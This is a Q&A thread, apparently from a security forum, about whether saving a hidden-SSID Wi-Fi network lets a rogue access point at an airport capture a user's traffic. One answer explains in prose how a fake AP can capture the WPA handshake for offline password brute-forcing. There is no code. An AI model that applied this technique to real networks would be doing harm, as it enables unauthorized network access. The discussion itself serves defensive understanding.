2

This question deals with whether hiding an SSID makes a given wifi network more or less secure (short answer: neither). On the other hand, I think that a client that saves a connection to a network with a hidden SSID is opening itself up to a future man-in-the-middle attack.

Here's my scenario:

Alice connects to a hidden wifi network named 'Bob.' She saves the connection and sets it to connect automatically in the future.

Alice goes to the airport, turns on her laptop, and it starts searching for a hidden wifi network named 'Bob.' Malfoy is running a device that is listening for suckers like Alice who are broadcasting in search of a hidden wifi network. Malfoy's device responds to Alice's laptop saying, "Yep. I'm 'Bob'. And that password you've provided me, that'll do just fine. Here's your internet connection."

At this point, all Alice knows is that she's connected to the internet. She proceeds to browse the internet, while Malfoy sits in the middle stealing her info.

Now, if Alice is savvy, she'll realize that the 'Bob' network shouldn't be available at this airport and something's wrong. But that's a fair amount of burden to place on a user, especially a non-technical one.

So, is the above scenario theoretically possible? Is it practical? If it's not possible, what prevents it from happening?

Community
  • 1
mwolfe02
  • 123
  • 1
  • 6

2 Answers2

3

The attack as you described it is not possible. This is the impossible part: "that password you've provided me, that'll do just fine". In the Wi-Fi protocol, the client doesn't send the password to the AP. Instead, both the client and AP derive an encryption key from it, and they mutually authenticate by making sure they can understand each other's messages.

Joseph Sible-Reinstate Monica
  • 7,110
  • 3
  • 21
  • 35
  • Got it. Since the key is derived from a mathematically difficult calculation, the malicious server can't reverse engineer the original password. And without the original password, the server can't encrypt its own messages. I feel better now :) – mwolfe02 Jul 27 '18 at 12:51
  • Of course, all of this goes out the window if it's an open network, right? So it strikes me that the most dangerous wifi network one could connect to, then, is an open network with a hidden SSID. – mwolfe02 Jul 27 '18 at 12:53
  • 1
    The security comes from the infeasibility of recovering the key from the communications encrypted with it, not the infeasibility of recovering the password from the key. – Joseph Sible-Reinstate Monica Jul 27 '18 at 20:34
  • The "Server" it's called Access Point (AP) or "router" by my mom and possibly yours too. It's called server only when it's an Enterprise Wi-Fi (Radius/Authentication Server) and your answer doesn't describe the how authentication works, you can get the four-way handshake and derive the password from the example provided. Search for "AP-less WPA personal cracking" – Azteca Jul 28 '18 at 18:28
  • It's not really fair to call cracking a password "deriving" it from listening to the exchange. Also, with the exception of WPA3 (which basically nothing supports yet), cracking a password doesn't require a MITM, just passive listening. – Joseph Sible-Reinstate Monica Jul 29 '18 at 00:08
1

So, is the above scenario theoretically possible? Is it practical? If it's not possible, what prevents it from happening?

Absolutely, it's both possible a practical, but not exactly like you described it.

Hidden SSID don't play a role at all since once the user saves the network, on the probe requests it needs to advertise that "hidden" network to see if the AP (Hidden) it's listening for that probe request to send a probe response back to the Station (STA - laptop)

The part where you are wrong it's this

Malfoy's device responds to Alice's laptop saying, "Yep. I'm 'Bob'. And that password you've provided me, that'll do just fine.

Here's how it actually works:

When Malfoy sees a probe request with "Hidden Network" He'll proceed to create a false SSID (Either hidden or not, it doesn't matter) on all types (WEP, WPA, WPA2, etc).

Once Alice's STA sees the "Hidden Network" it will start the connection process. Malfoy's fake AP will send the Message 1 of the 4WH sending the ANounce, Alice with this will create her own encryption key (PTK) and will send back it's own nounce (SNounce) and the MIC in the Message 2 back to the AP, now, we can't create the encryption key because we don't have the password right? So the MIC won't match and the connection will fail from here on... but that's OK, we already have all we need to brute force the password as usual.

Here's the process illustrated on YouTube with your same scenario, home access point (Not hidden since it doesn't affect once it's saved on the STA) and Alice being naive and all in the Airport.

Azteca
  • 1,116
  • 7
  • 16